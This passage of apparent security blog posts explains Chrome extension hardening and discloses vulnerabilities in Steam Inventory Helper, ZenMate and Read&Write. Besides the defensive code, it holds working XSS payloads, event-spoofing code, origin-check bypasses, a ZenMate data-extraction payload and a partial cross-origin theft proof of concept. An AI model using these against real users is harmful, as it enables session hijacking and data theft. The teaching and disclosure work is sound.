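        .replace( /'/g, "&#x27;" );
}

// A payload is rendered inert instead of being parsed as markup:
escape_html( "<img src=x onerror=alert(1)>" );
// → "&lt;img src=x onerror=alert(1)&gt;"

// Better still, skip HTML-building and assign text directly in the browser:
// element.textContent = untrusted_input;  // never interpreted as markup
```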

The Web Page DOM Cannot Be Trusted

Another common anti-pattern that Chrome extension developers will fall into is that they will trust content provided from an external web page. This manifests in multiple forms such as trusting data in the DOM, events fired from event listeners, or messages sent from the web page to a Content Script.

In the case of the DOM, an attacker can modify the layout into any format they’d like in order to exploit the Content Script’s use of it. It should also be noted that any sensitive data put into the DOM is accessible to attackers via a malicious web page, or via an XSS vulnerability in a trusted web page. For example, the Grammarly Chrome extension made this mistake when it put sensitive authentication tokens into the DOM of all web pages, allowing a malicious web page to simply extract them from the DOM and use them to authenticate to Grammarly’s API. This mistake is perhaps most common when an extension injects some sort of UI into a web page for the user to view. Oftentimes developers will put sensitive information into these UI elements which should never leave the Chrome extension at all. Even worse, these elements are often later queried again by the Content Script and used to perform trusted operations. These patterns allow an attacker to swoop into the middle of these actions and modify the DOM elements to contain unexpected input.

JavaScript DOM Events Must Be Verified

Event listeners, one of the primary channels between Content Scripts and the web page DOM, are also subject to exploitation by attackers. These are especially deceptive because developers expect events to be generated purely from user actions and not synthetically created by an attacker. Take a script such as the following:

// Create an element to inject
var injected_last_key_element = document.createElement( "div" );
injected_last_key_element.innerHTML = 'Last character typed: <div id="last_keypress_div"></div>';
// Inject this box into the page
document.body.appendChild(
    injected_last_key_element
);

// Listen for keydown event and show its value in the previously-injected div
document.body.addEventListener( "keydown", function( keyevent ) {
    document.getElementById( "last_keypress_div" ).innerHTML = keyevent.code;
});

The above code will listen for keydown events and will display the last key code value inside of a <div> injected into the document’s body. So if you pressed the “a” key on your keyboard, the string “KeyA” would appear inside of this injected <div>. The following is a screenshot from MDN documentation on KeyboardEvent:

keyboard-event-code

The page on KeyboardEvent.code itself states the following:

The KeyboardEvent.code property represents a physical key on the keyboard (as opposed to the character generated by pressing the key). In other words, this property returns a value which isn’t altered by keyboard layout or the state of the modifier keys.

Reading this documentation, as a developer you might think that XSS is not possible here. After all, this will only display the last key code pressed by the user’s keyboard, and the documentation says the property is “Read Only”! How could that be used to cause XSS? Even if you could send synthetic events, it would just be the predefined key codes, and the <div> would be rewritten on each event, right?

However, you’d be completely wrong; this is actually easily exploitable. The following demonstrates code which results in an XSS:

// Generate a synthetic key event
function generate_fake_key_event(target_element, key_event_type, custom_properties) {
  var new_event = document.createEvent(
    "KeyboardEvent"
  );
  for (var property_keyname in custom_properties) {
    if (custom_properties.hasOwnProperty(property_keyname)) {
      // Chromium Hack
      Object.defineProperty(new_event, property_keyname, {
        get: function() {
          return custom_properties[property_keyname];
        }
      });
      new_event.initKeyboardEvent(
        key_event_type,
        true,
        true,
        document.defaultView,
        false,
        false,
        false,
        false,
        0,
        0
      );
      new_event[property_keyname] = custom_properties[property_keyname];
    }
  }
  target_element.dispatchEvent(
    new_event
  );
}
// Send a keydown with a code of <img src=x onerror=alert('XSS') />
generate_fake_key_event(
  document.body,
  "keydown",
  {
    "code": "<img src=x onerror=alert('XSS') />",
  }
)

The above code results in the XSS firing, and an alert with the text “XSS” to be displayed:

xss-alert

The above example demonstrates a few important pitfalls of trusting arbitrary events:

  • Events can be generated without any user interaction.
  • Even if an event states something similar to “Read Only” in the documentation, this is purely to state that an authentically-created event can’t have this property modified after being generated. This doesn’t apply at all to synthetically-generated events.
  • Synthetically-generated events don’t even have to follow the expected format for event property values. Even though the documentation says the “codes” are in a predefined format, this is not enforced in the case of synthetically-generated events. So an attacker can specify <img src=x onerror=alert('XSS') /> instead of something like KeyA.

This all sounds very painful, but luckily there is a simple check that can be done to verify that an event is actually user-generated. User generated events have their isTrusted property set to true, whereas script-generated events have the isTrusted property set to false. Using this check we can verify if an event was actually created by a user or is simply synthetic:

// Listen for keydown event and show its value in the previously-injected div
document.body.addEventListener( "keydown", function( keyevent ) {
    if( keyevent.isTrusted ) {
        document.getElementById( "last_keypress_div" ).innerHTML = keyevent.code;
    }
});

Now an attacker cannot send completely mangled synthetic events to us. All events we process will have to be triggered originally by the end user. While the isTrusted property is not commonly used, it is essential in the case of Content Scripts processing web page events.
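The effect of the guard can be sketched with plain objects standing in for real KeyboardEvents (in the browser, isTrusted is set by Chrome itself and cannot be forged by page script; the handler name below is made up):

```javascript
// Process a keydown event only if it was generated by a real user action.
function handle_keydown( keyevent ) {
    if( !keyevent.isTrusted ) {
        // Synthetic event: drop it entirely.
        return null;
    }
    return keyevent.code;
}

// A synthetic event carrying a payload is dropped...
handle_keydown({ isTrusted: false, code: "<img src=x onerror=alert('XSS') />" }); // → null

// ...while a user-generated event is processed normally.
handle_keydown({ isTrusted: true, code: "KeyA" }); // → "KeyA"
```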

This example is admittedly contrived, because if an attacker can create arbitrary events on your page you are likely already owned at the web page level, so an XSS in the web page caused by this is circular. A real-world example would be the Background Page doing something unsafe with event data retrieved by a Content Script, but for simplicity’s sake we’ve kept it to a demonstration of JavaScript event spoofing in a regular web page.

Messages Sent From Web Pages Cannot Be Trusted

Yet another common pattern in Chrome extensions is the use of JavaScript’s postMessage() for message passing to call privileged Chrome extension APIs in the Background Page. Often a message is issued from a web page, received by the Content Script via an event listener, and is then relayed to the Background Page to call some privileged Chrome APIs. This creates a direct bridge where any web page can make use of privileged Chrome extension APIs, and results in some nasty things if the developer is not checking the origin of the message.

Often, even if a developer is checking the origin of the received messages, they will implement a check similar to the following:

window.addEventListener( "message", function( received_message ) {
    // Check to make sure this a sub-domain of our site
    if( received_message.origin.indexOf( ".trusteddomain.com" ) !== -1 ) {
        process_message( received_message );
    }
}, false);

Or, if they are a fan of regex they will do something similar to the below examples:

received_message.origin.match(/https:\/\/www\.trusteddomain\.com/i)
...
received_message.origin.match(/https?:\/\/www.trusteddomain.com$/i)
...

Sadly, all of these checks are bypassable; the following demonstrates a bypass for each:

// Bypassed with https://a.trusteddomain.com.attacker.com
received_message.origin.indexOf( ".trusteddomain.com" ) !== -1

// Also bypassed with https://www.trusteddomain.com.attacker.com
received_message.origin.match(/https?:\/\/www\.trusteddomain\.com/i)

// Bypassed with https://wwwatrusteddomain.com
received_message.origin.match(/https?:\/\/www.trusteddomain.com$/i)
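Written as small functions, each flawed check can be confirmed to accept an attacker-controlled origin (trusteddomain.com and attacker.com are of course placeholders):

```javascript
// Substring check: matches anywhere in the origin string.
function check_indexof( origin ) {
    return origin.indexOf( ".trusteddomain.com" ) !== -1;
}
// Regex without anchors: matches the trusted origin as a prefix.
function check_unanchored_regex( origin ) {
    return /https?:\/\/www\.trusteddomain\.com/i.test( origin );
}
// Anchored regex, but with unescaped dots that match any character.
function check_unescaped_dots( origin ) {
    return /https?:\/\/www.trusteddomain.com$/i.test( origin );
}

check_indexof( "https://a.trusteddomain.com.attacker.com" );           // → true (bypassed)
check_unanchored_regex( "https://www.trusteddomain.com.attacker.com" ); // → true (bypassed)
check_unescaped_dots( "https://wwwatrusteddomain.com" );               // → true (bypassed)
```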

This is almost certainly because the origin property of the received message is a string of the site’s origin, not an object with the origin’s parts already parsed out. Parsing URLs is a famously pitfall-prone problem, so handing every developer a string and asking them to check it themselves naturally lends itself to these issues. Perhaps in future web standards a native origin-verification function could be added to give developers a more assured way to validate this.

To safely validate the origins of messages, it is recommended to have a static list of trusted HTTPS origins. Ensuring HTTPS is important because without it an extension can be vulnerable to man-in-the-middle attacks. The following is an example of secure code to do this:

var trusted_origins = [
    "https://trusteddomain.com",
    "https://www.trusteddomain.com",
    "https://extension.trusteddomain.com"
];

if( trusted_origins.includes( received_message.origin ) ) {
    // We can trust this message came from the right place
    process_message( received_message );
}

This keeps the surface area small and leaves little room for error when checking to see if an origin is trusted.

Of course, many developers would prefer to simply whitelist all subdomains of their main domain so that they will not have to change the source code to add new hostnames. While I’d recommend against doing this (for reasons discussed below), safe code for doing so can be seen below:

// Pull out the message origin
var message_origin = received_message.origin;

// Specify your trusted domain
var base_domain = "trusteddomain.com";

if( message_origin.startsWith( "https://" ) && ( message_origin.endsWith( "." + base_domain ) || message_origin === "https://" + base_domain ) ) {
    // Message is HTTPS and a sub-domain, trust it.
    process_message( received_message );
}

The above code is straightforward: it simply checks that an origin is both HTTPS and either a sub-domain of the trusted base domain, or the base domain itself.
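The same check, wrapped as a reusable function so its behavior can be exercised directly (trusteddomain.com is a placeholder for your own domain):

```javascript
// Returns true only for HTTPS origins that are the base domain itself
// or a sub-domain of it.
function is_trusted_suborigin( message_origin, base_domain ) {
    return message_origin.startsWith( "https://" ) &&
        ( message_origin.endsWith( "." + base_domain ) ||
          message_origin === "https://" + base_domain );
}

is_trusted_suborigin( "https://api.trusteddomain.com", "trusteddomain.com" );     // → true
is_trusted_suborigin( "https://trusteddomain.com", "trusteddomain.com" );         // → true
is_trusted_suborigin( "http://api.trusteddomain.com", "trusteddomain.com" );      // → false (not HTTPS)
is_trusted_suborigin( "https://attackertrusteddomain.com", "trusteddomain.com" ); // → false
```

The leading dot in the endsWith() comparison is what keeps lookalike domains such as attackertrusteddomain.com from slipping through.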

One final, but equally important thing to remember to check is the message event source. Inbound messages have a source property which is a reference to the window which sent it. Most of the time a Content Script is making the assumption that the sender of the message is the same window which the Content Script is running on. For this reason it’s important that the following simple check be added as well:

// Check to make sure the sender is the window we expect.
// If it’s not, return immediately.
if( received_message.source !== window ) {
    return;
}

The above check ensures that the window which sent the message is the same one the Content Script is running on. If it is not, the script returns immediately instead of processing the message. A common mistake developers make is to skip checking the source of the message and then perform DOM manipulations based on the content of the received message. This means that another page could potentially send a malicious message to a target site to force an insecure DOM operation via the Content Script, resulting in XSS. While there are edge cases where you wouldn’t want the source window to be the same one the Content Script runs on, the vast majority of extensions should implement this simple check.

The King Shouldn’t Live Outside the Castle Walls

Now that I’ve shown you safe code for ensuring that something is a subdomain of your trusted domain, I want to take a moment to discuss surface area.

Often enough, you will see extensions that allow privileged Chrome extension API calls only from subdomains of a domain owned by the Chrome extension owner. This pattern is often seen as useful for developers because they can more easily change their website’s code to make different calls to the Chrome extension’s APIs instead of having to update the extension itself. Once you’re operating on this idea, often the next one is to simply allow privileged API calls from any subdomain of your trusted base domain.

This behavior is also easy to fall into when using the externally_connectable directive. This directive states which origins can send messages to the extension’s Background Page. Even in the official documentation, the example provided is the following, which allows all subdomains of a base domain, over either HTTP or HTTPS, to send messages:

"externally_connectable": {
  "matches": ["*://*.example.com/*"]
}

All of that seems very reasonable from a development point of view. However, what the developer has effectively done is move the security barrier from the strongly-locked-down Background Page to any sub-domain of their domain. This means that an attacker could completely hijack these privileged calls if they gain arbitrary JavaScript execution on any sub-domain of the trusted domain. There are a number of ways that this can occur:

  • A Cross-site Scripting (XSS) vulnerability on any in-scope sub-domain.
  • A sub-domain takeover, such as a dangling DNS record pointing at an unclaimed service.
  • An expired domain that is open for re-registration (as we will see shortly).
  • A man-in-the-middle attack, if the match pattern also allows plain HTTP (as *:// does).

It takes only one slip-up on any of these sub-domains for the Chrome extension to become vulnerable. Compare this to all of the protections, such as CSP and web navigation blocking, given to Chrome extension Background Pages and the stark contrast becomes clear. Why play a game rigged in the attacker’s favor?
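If a single dedicated origin can be used instead, a tighter externally_connectable keeps the barrier narrow. The hostname below is of course a placeholder:

```
"externally_connectable": {
  "matches": ["https://extension.example.com/*"]
}
```

Pinning the scheme to HTTPS and the hostname to one exact origin reduces the attack surface from every sub-domain (over any scheme) to a single, well-defended host.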

A good example of this problem can be seen in a critical vulnerability I found in the ZenMate VPN Chrome extension (at the time of this writing it has ~3.5 million users). The following is an excerpt from their (previously) vulnerable manifest.json:

...trimmed for brevity...
{
  "js": [
    "scripts/page_api.js"
  ],
  "matches": [
    "*://*.zenmate.com/*",
    "*://*.zenmate.ae/*",
    "*://*.zenmate.ma/*",
    "*://*.zenmate.dk/*",
    "*://*.zenmate.at/*",
    "*://*.zenmate.ch/*",
    "*://*.zenmate.de/*",
    "*://*.zenmate.li/*",
    "*://*.zenmate.ca/*",
    "*://*.zenmate.co.uk/*",
    "*://*.zenmate.ie/*",
    "*://*.zenmate.co.nz/*",
    "*://*.zenmate.com.ar/*",
    "*://*.zenmate.cl/*",
    "*://*.zenmate.co/*",
    "*://*.zenmate.es/*",
    "*://*.zenmate.mx/*",
    "*://*.zenmate.com.pa/*",
    "*://*.zenmate.com.pe/*",
    "*://*.zenmate.com.ve/*",
    "*://*.zenmate.fi/*",
    "*://*.zenmate.fr/*",
    "*://*.zenmate.co.il/*",
    "*://*.zenmate.in/*",
    "*://*.zenmate.hu/*",
    "*://*.zenmate.co.id/*",
    "*://*.zenmate.is/*",
    "*://*.zenmate.it/*",
    "*://*.zenmate.jp/*",
    "*://*.zenmate.kr/*",
    "*://*.zenmate.lu/*",
    "*://*.zenmate.lt/*",
    "*://*.zenmate.lv/*",
    "*://*.zenmate.my/*",
    "*://*.zenmate.be/*",
    "*://*.zenmate.nl/*",
    "*://*.zenmate.pl/*",
    "*://*.zenmate.com.br/*",
    "*://*.zenmate.pt/*",
    "*://*.zenmate.ro/*",
    "*://*.zenmate.com.ru/*",
    "*://*.zenmate.se/*",
    "*://*.zenmate.sg/*",
    "*://*.zenmate.com.ph/*",
    "*://*.zenmate.com.tr/*",
    "*://*.zenmate.pk/*",
    "*://*.zenmate.vn/*",
    "*://*.zenmate.hk/*"
  ],
  "run_at": "document_start"
}
...trimmed for brevity...

The Content Script page_api.js allows privileged API calls to the extension in order to do things like retrieve user information, whitelist sites so they’re not proxied, and toggle whether or not the user is connected to the VPN. Given the above list of dozens of domains, there is a lot of surface area to potentially exploit. In order to hijack this extension, we’d need an XSS on any sub-domain of any of these dozens of domains.

However, it turns out we didn’t even need that. One of the domains, zenmate.li, had expired and was open for registration. After buying it and setting up a website on it, all that was needed to extract user information was to run the following payload on this whitelisted domain:

// Make call to Content Script to get all user data
__zm.getData(function(results) {
    console.log(
        results
    );
});

// Turn off VPN
__zm.toggle(false);

With this payload we can retrieve all of the user’s information (their authentication tokens, email address, etc.) and completely de-anonymize them, effectively bypassing all the protections of the extension. While the vendor’s response was prompt and this issue is now fixed, it demonstrates exactly the type of critical problem that can occur when you move control of the extension outward to multiple websites and expand the attack surface. For a full write-up, please see this post which goes further into the details.

Generally Sane Parsing of URLs

There are other situations where a developer might find themselves parsing a given URL to see if it’s from a trustable origin. This can occur through usage of APIs such as chrome.tabs.get() which returns a Tab object full of metadata on the queried tab. Developers will often attempt to parse the url property of this object via a regular expression to see if it’s a site that they trust. As we saw before, parsing URLs is tricky business and is very hard to get right. The core of this problem is that the code you write to pull out a URL’s origin could differ from how Chrome does it internally, resulting in a bypass.

A clean way to sanely pull an origin out of a given URL is to use the URL() constructor:

// Input URL
var input_url = "https://trusted-domain.com/example-url/?red=blue#yellow";

// Safely check to see if a URL matches a target origin
function check_origin_match( input_url, target_origin ) {
    var parsed_url = new URL(
        input_url
    );
    return ( parsed_url.origin === target_origin );
}

if( check_origin_match( input_url, "https://trusted-domain.com" ) ) {
    // URL is from a trusted origin!
} else {
    // Not from a trusted origin.
}

The above code is special because it shifts the work to Chrome’s URL parser to retrieve the origin from a given URL. This ensures that your code and Chrome’s code agree on the actual origin of a given URL. Instead of using the check_origin_match() function above, you can also pass a URL to the URL() constructor yourself and compare its origin property directly. This addresses cases where you need to securely check a URL’s origin when it has not already been parsed out for you. The resulting URL object also contains useful parsed-out fields for the hash, hostname, path, query parameters, and more.
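For reference, these are the parsed-out fields of a URL object, shown for a hypothetical URL:

```javascript
// Parse a URL once and read its components off the resulting object.
var parsed_url = new URL( "https://trusted-domain.com/example-url/?red=blue#yellow" );

parsed_url.origin;                  // → "https://trusted-domain.com"
parsed_url.hostname;                // → "trusted-domain.com"
parsed_url.pathname;                // → "/example-url/"
parsed_url.hash;                    // → "#yellow"
parsed_url.searchParams.get("red"); // → "blue"
```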

Clickjacking & Careful Use of web_accessible_resources

The web_accessible_resources directive denotes which resources such as extension pages, images, and JavaScript can be embedded by arbitrary websites. As outlined earlier, by default, arbitrary web pages cannot embed extension pages in iframes, or source them via script or stylesheet tags. Example usage of this directive can be seen below:

{
  ...trimmed for brevity...
  "web_accessible_resources": [
    "images/*.png",
    "style/double-rainbow.css",
    "script/double-rainbow.js",
    "script/main.js",
    "templates/*"
  ],
  ...trimmed for brevity...
}

As can be seen from the above example, not only can you specify specific resources but you can also wildcard a folder of resources as well. However, occasionally developers will experience an issue with Chrome blocking their ability to embed extension resources and will do something like the following:

{
  ...trimmed for brevity...
  "web_accessible_resources": [
    "*"
  ],
  ...trimmed for brevity...
}

This is a completely valid policy and essentially means that all Chrome extension resources can now be embedded in third party websites. The problem is that this turns into a clickjacking vulnerability when your extension contains pages which perform privileged actions and also fall under your web_accessible_resources policy. For a good example of an extension vulnerability caused by clickjacking see this post about a UXSS in Steam Inventory Helper.
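A minimal sketch of what such a clickjacking page can look like (the extension ID and page name are placeholders): the privileged extension page is loaded in an invisible iframe stacked over decoy UI, so the victim’s clicks land on the extension page instead of what they see:

```
<!-- Decoy UI the victim believes they are interacting with -->
<button style="position:absolute; top:100px; left:100px;">Claim your prize</button>

<!-- Privileged extension page, made transparent and stacked on top so clicks
     fall through to it (placeholder extension ID and page) -->
<iframe src="chrome-extension://aaaabbbbccccddddeeeeffffgggghhhh/options.html"
        style="position:absolute; top:0; left:0; width:100%; height:100%;
               opacity:0; z-index:2;">
</iframe>
```

Extension pages cannot defend themselves with X-Frame-Options or frame-ancestors the way websites can, so keeping privileged pages out of web_accessible_resources is the real fix.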

Automating the Auditing Process With tarnish

Due to the unique structure of Chrome extensions, I decided to write a service to help developers and security researchers audit Chrome extensions for security vulnerabilities. This tool, which I’ve named tarnish, has the following features:

  • Pulls any Chrome extension from a provided Chrome webstore link.
  • manifest.json viewer: simply displays a JSON-prettified version of the extension’s manifest.
  • Fingerprint Analysis: Detection of web_accessible_resources and automatic generation of Chrome extension fingerprinting JavaScript.
  • Potential Clickjacking Analysis: Detection of extension HTML pages with the web_accessible_resources directive set. These are potentially vulnerable to clickjacking depending on the purpose of the pages.
  • Permission Warning(s) viewer: shows a list of all the Chrome permission-prompt warnings that will be displayed when a user attempts to install the extension.
  • Dangerous Function(s): shows the location of dangerous functions which could potentially be exploited by an attacker (e.g. functions such as innerHTML, chrome.tabs.executeScript).
  • Entry Point(s): shows where the extension takes in user/external input. This is useful for understanding an extension’s surface area and looking for potential points to send maliciously-crafted data to the extension.
  • Both the Dangerous Function(s) and Entry Point(s) scanners have the following for their generated alerts:
    • Relevant code snippet and line that caused the alert.
    • Description of the issue.
    • A “View File” button to view the full source file containing the code.
    • The path of the alerted file.
    • The full Chrome extension URI of the alerted file.
    • The type of file it is, such as a Background Page script, Content Script, Browser Action, etc.
    • If the vulnerable line is in a JavaScript file, the paths of all of the pages where it is included, as well as these pages’ types and web_accessible_resources status.
  • Content Security Policy (CSP) analyzer and bypass checker: This will point out weaknesses in your extension’s CSP and will also illuminate any potential ways to bypass your CSP due to whitelisted CDNs, etc.
  • Known Vulnerable Libraries: This uses Retire.js to check for any usage of known-vulnerable JavaScript libraries.
  • Download extension and formatted versions.
    • Download the original extension.
    • Download a beautified version of the extension (auto prettified HTML and JavaScript).
  • Automatic caching of scan results: the first scan of an extension will take a good amount of time, but subsequent scans (assuming the extension hasn’t been updated) will be almost instant due to the results being cached.
  • Linkable Report URLs, easily link someone else to an extension report generated by tarnish.

All of these features have been created to automate annoying repetitive actions I’ve had to undertake while auditing various Chrome extensions. If you have suggestions or bugs in any of the functionality of the service, please feel free to reach out to me and I’ll look into it.

Click here to try out the tarnish Chrome extension analyzer.

 

Summary

The “Steam Inventory Helper” Chrome extension version 1.13.6 suffered from both a DOM-based Cross-site Scripting (XSS) and a clickjacking vulnerability. By combining these vulnerabilities it is possible to gain JavaScript code execution in the highly-privileged context of the extension’s background page. Due to the extension declaring the “<all_urls>” permission, this vulnerability can be exploited to hijack all sites that the victim is authenticated to. For example, if a user is authenticated to their bank, Steam, Gmail, and Facebook, this vulnerability could be used to access all of those accounts. This vulnerability is fixed in the latest version of the extension and all users should update (if Chrome has not done so for them automatically).

The core of this issue is a DOM-based Cross-site Scripting (XSS) vulnerability in “/html/bookmarks.html”, which is frameable from arbitrary web pages due to the “web_accessible_resources” directive specifying this resource. By submitting an entry with an XSS payload as its name, this page can be exploited to gain JavaScript execution in the context of the extension. Since a user is unlikely to paste an XSS payload into this page of their own will, the clickjacking vulnerability is used to redress the UI of the application to trick the victim into exploiting the issue. A pretext of a “Bot Detection” page is used to get the victim to paste the payload (hidden inside of a larger “verification code”) and click the “Add” button to exploit the issue. The full proof-of-concept can be seen in the video below.

Proof-of-Concept

Technical Details

The first vulnerability is the DOM-based Cross-site Scripting (XSS) vulnerability in “/html/bookmarks.html”, the following is the vulnerable JavaScript from the included “bookmarks.js”:

$('#btAdd').click(function() {
    var btname = $('#txtName').val();
    if ($('.custom-button .name').filter(function() {
        return $(this).text() === btname;
    }).length) return false;

    var span = $('<span class="custom-button">');
    span.html('<span class="name">' + btname + '</span>');
    span.append('<a href="javascript:void(0)" title="remove">x</a>');
    span.attr('title', btname);
    span.data('id', (new Date().getTime()));
    $('div.custom-buttons .existing').append(span);
    save_options();
});

The above JavaScript takes the value of the “txtName” text box and uses string concatenation to build HTML which is appended to the DOM via jQuery’s “append()” function. This is the core of the XSS vulnerability, since user input should always be contextually escaped to prevent injection of arbitrary markup. Normally, the Chrome extension’s Content Security Policy (CSP) should prevent this vulnerability from being exploited. However, due to the loosening of this policy via ‘unsafe-eval’ and the use of jQuery’s DOM APIs, it was still exploitable. This is because many of jQuery’s DOM APIs make use of “globalEval()”, which automatically passes scripts to “eval()” upon appending them to the DOM.

While this is a serious vulnerability, on its own its impact is fairly limited due to the user interaction required: the victim would have to open the page, paste a Cross-site Scripting (XSS) payload into the field, and click the “Add” button.

To better weaponize this vulnerability, we make use of a separate issue (clickjacking) to bolster the attack.

The following is an excerpt from the Chrome extension’s manifest:

...trimmed for brevity...
"web_accessible_resources": [
    "_locales/*",
    "bundle/*",
    "dist/*",
    "assets/*",
    "font/*",
    "html/bookmarks.html",
    "css/*.css",
    "js/*.js",
    "js/jquery/*.js",
    "js/lang/*"
],
...trimmed for brevity...

The above section demonstrates that the extension casts a wide net with its “web_accessible_resources” policy. By default Chrome extensions prevent framing and navigation to Chrome extension pages from arbitrary web pages as an extra security measure. This directive loosens that restriction, allowing third party pages to navigate to and frame the specified resources. Many of the extension’s privileged UI pages are specified under this directive, rendering the extension vulnerable to clickjacking.

As can be seen in the excerpt, the “/html/bookmarks.html” page is frameable and thus exploitable via clickjacking. We abuse this by iframing the page in our own web page and overlaying the frame with DOM elements to redress the layout. This makes the victim unaware that they are actually interacting with the extension below. The following animation demonstrates this effect:

[Animation: clickjacking UI-redressing example]

The above example demonstrates how we redress the UI to trick the victim. The “Bot Detection” page provides a button to click to copy the “Verification code” to the victim’s clipboard. This “verification code” is actually a Cross-site Scripting (XSS) payload inside of a large amount of random hex bytes. This hides the payload from the victim’s view while they paste it into the extension’s textbox, leading the victim into believing they are just copying and pasting a long random code. Finally, when the victim clicks the “Add” button, the XSS fires.

Root Cause & Further Thoughts

There are two notable points of interest in this exploit. The first is that we were able to achieve DOM-XSS even with a fairly tight Content Security Policy (CSP) of the following:

"script-src 'self' 'unsafe-eval'; object-src 'self'"

While this CSP is fairly strong, it crumbles when combined with unsafe usage of jQuery’s DOM manipulation APIs such as “.html()” and “.append()”. This is something to look for when auditing Chrome extensions (and when writing them): if you make use of jQuery and have ‘unsafe-eval’ in your CSP, you’re playing with fire.
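One hardening step (a sketch of a tightened manifest entry, not the vendor’s actual fix) is simply to drop ‘unsafe-eval’, which blocks jQuery’s “globalEval()” path at the CSP layer:

```json
"content_security_policy": "script-src 'self'; object-src 'self'"
```

With this policy the injected script would trigger a CSP violation instead of executing, though removing the string concatenation remains the correct root-cause fix.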

The second interesting point is that clickjacking is a valid vulnerability which can absolutely affect Chrome extensions. All that is required is that a privileged Chrome extension UI page be exposed via the “web_accessible_resources” directive. After taking a look at many of the popular extensions on the Chrome store it seems many of them fall victim to this simple mistake. Most of the time this is due to accidental overscoping via wildcarding of a privileged extension HTML page. This not only opens up extensions to attacks like clickjacking but can result in other vulnerabilities if the extension takes in user input from “location.hash”, “postMessage”, etc. The default protection given to Chrome extensions via the navigation sandboxing should not be taken for granted by extension developers.
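In this case, a tighter policy (an illustrative sketch, not the vendor’s fix) would expose only genuinely public assets and keep privileged UI pages like “html/bookmarks.html” out of the list entirely:

```json
"web_accessible_resources": [
    "assets/*",
    "font/*",
    "css/*.css"
]
```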

Timeline

  • June 4: Disclosed to SIH TechSupport (owners of the extension)
  • June 6: Vendor confirms receipt of issue, states they will look into it and fix it.
  • June 7: Vendor updates extension to fix the vulnerabilities.

[Image: Read&Write extension listing on the Chrome Web Store]

Summary

Due to a lack of proper origin checks in its message passing from regular web pages, any arbitrary web page is able to call privileged background page APIs of the Read&Write Chrome extension (vulnerable version 1.8.0.139). Many of these APIs allow for dangerous actions which are not meant to be callable by arbitrary web pages on the internet. One example is the background API call with the method name “thGetVoices”, which allows an attacker to provide an arbitrary URL that the extension will retrieve, with the response returned via “postMessage”. By abusing this call an attacker can hijack the extension to read data from other websites using the victim’s authenticated sessions. As a proof of concept, I’ve created an exploit which, upon being viewed with the Read&Write extension installed, will steal and display all of the user’s emails. This is of course not a vulnerability in Gmail, but an example of the exploitation that can occur using this vulnerability. See the video proof-of-concept below for a demonstration of the issue.

Texthelp, the company that created the extension, patched quickly and released a fix the next business day (nice work!). For this reason the latest version of the extension is no longer vulnerable to this issue. They also showed real interest and care about remediating further issues in the extension and stated they’d be further hardening the codebase.

Technical Description

The Read&Write Chrome extension makes use of the Content Script “inject.js” to inject a custom toolbar into various online document pages such as Google Docs. This Content Script is injected into all HTTP and HTTPS origins by default. This is demonstrated by the following excerpt from the extension’s manifest:

...trimmed for brevity...
  "content_scripts": [
    {
      "matches": [ "https://*/*", "http://*/*" ],
      "js": [ "inject.js" ],
      "run_at": "document_idle",
      "all_frames": true
    }
  ],
...trimmed for brevity...

Inside of the “inject.js” file there is an event listener for any messages sent via postMessage by a web page which the Content Script is injected into:

window.addEventListener("message", this.onMessage)

This calls the “this.onMessage” function upon any postMessage being sent to the web page’s window. The following is the code for this function:

function onMessage() {
    void 0 != event.source && void 0 != event.data && event.source == window && "1757FROM_PAGERW4G" == event.data.type && ("connect" == event.data.command ? chrome.extension.sendRequest(event.data, onRequest) : "ejectBar" == event.data.command ? ejectBar() : "th-closeBar" == event.data.command ? chrome.storage.sync.set({
        enabledRW4GC: !1
    }) : chrome.extension.sendRequest(event.data, function(e) {
        window.postMessage(e, "*")
    }))
}

In the above code snippet, it can be seen that the function will pass along all received postMessage messages to the background page via “chrome.extension.sendRequest”. Additionally, the responses to these messages will be passed back to the “onMessage” function and then passed back to the web page. This essentially constructs a proxy which allows regular web pages to send messages to the Read&Write background page.

Read&Write loads a number of background scripts, which can be seen in this excerpt from the extension’s manifest:

...trimmed for brevity...
"background": {
  "scripts": [
    "assets/google-analytics-bundle.js",
    "assets/moment.js",
    "assets/thFamily3.js",
    "assets/thHashing.js",
    "assets/identity.js",
    "assets/socketmanager.js",
    "assets/thFunctionManager.js",
    "assets/equatio-latex-extractor.js",
    "assets/background.js",
    "assets/xmlIncludes/linq.js",
    "assets/xmlIncludes/jszip.js",
    "assets/xmlIncludes/jszip-load.js",
    "assets/xmlIncludes/jszip-deflate.js",
    "assets/xmlIncludes/jszip-inflate.js",
    "assets/xmlIncludes/ltxml.js",
    "assets/xmlIncludes/ltxml-extensions.js",
    "assets/xmlIncludes/testxml.js"
  ]
},
...trimmed for brevity...

While these background scripts register many message listeners (and many functions callable via these messages), we’ll focus on an immediately exploitable example. The following is an excerpt from the file “background.js”:

...trimmed for brevity...
chrome.extension.onRequest.addListener(function(e, t, o) {
...trimmed for brevity...
if ("thGetVoices" === e.method && "1757FROM_PAGERW4G" == e.type) {
    if (g_voices.length > 0 && "true" !== e.payload.refresh) return void o({
        method: "thGetVoices",
        type: "1757FROM_BGRW4G",
        payload: {
            response: g_voices
        }
    });
    var c = new XMLHttpRequest;
    c.open("GET", e.payload.url, !0), c.onreadystatechange = function() {
        4 == this.readyState && 200 == this.status && (g_voices = this.responseText.toString(), o({
            method: "thGetVoices",
            type: "1757FROM_BGRW4G",
            payload: {
                response: g_voices
            }
        }))
    }, c.send()
}
...trimmed for brevity...

The above snippet executes when the “chrome.extension.onRequest” listener fires with an event whose “method” is set to “thGetVoices” and whose “type” is set to “1757FROM_PAGERW4G”. If the cached “g_voices” is empty, or the event’s “payload.refresh” is set to the string “true”, an XMLHttpRequest fires with a GET to the URL specified in “payload.url”. Upon the request completing with a status code of 200, a response message is generated containing the request’s responseText.
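The caching branch can be restated as follows (a sketch of the quoted logic with a hypothetical helper name, not code from the extension):

```javascript
// Restatement of the listener's caching decision: the cross-origin GET
// only fires when the voice cache is empty or refresh is exactly "true".
function shouldFetch(cachedVoices, payload) {
    return !(cachedVoices.length > 0 && payload.refresh !== "true");
}
```

This is why the exploit sets “refresh” to “true”: it forces a fresh request to the attacker-chosen URL even when the cache is already populated.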

By abusing this call we can send a message to the background page with an arbitrary URL which will be replied to with the HTTP response body. This request will execute using the victim’s cookies and thus will allow a payload on any arbitrary web page to steal content from other web origins. The following payload is an example proof-of-concept which exploits this:

function exploit_get(input_url) {
    return new Promise(function(resolve, reject) {
        var event_listener_callback = function(event) {
            // Only resolve on the background page's reply message.
            if (event.data && event.data.payload && event.data.payload.response) {
                window.removeEventListener("message", event_listener_callback, false);
                resolve(event.data.payload.response);
            }
        };
        window.addEventListener("message", event_listener_callback, false);
        window.postMessage({
            "type": "1757FROM_PAGERW4G",
